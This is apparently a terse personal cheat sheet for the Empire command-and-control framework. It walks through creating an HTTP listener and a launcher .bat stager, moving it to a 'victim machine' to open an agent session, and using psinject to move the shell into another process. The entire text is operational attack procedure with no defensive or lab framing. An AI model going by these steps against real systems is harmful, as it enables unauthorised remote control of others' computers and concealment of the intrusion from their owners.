Listner, Stager and agent
Listener, Stager and agent
set listener first
uselistener <double tab> to check all listeners
uselistener <listener> to select listener
info to check info about it
set Host <ip>
set stager
usestager <stager module>
set Listener <set listener name> like set Listener http
launcher****************************************************.bat**************************************************** file will be created , transfer it to victim machine
in cmd, launcher.bat , to execute and session will be created in empire
agents to check active session
interact <agent-name>
help to check all available commands
ps to check all process in window including this shell process psinject <listener-name> <pid> to transfer the shell process to another process psinject http 3568
agents interact <new-session>
Noteto run most commands use shell
like shell cd /root
Last updated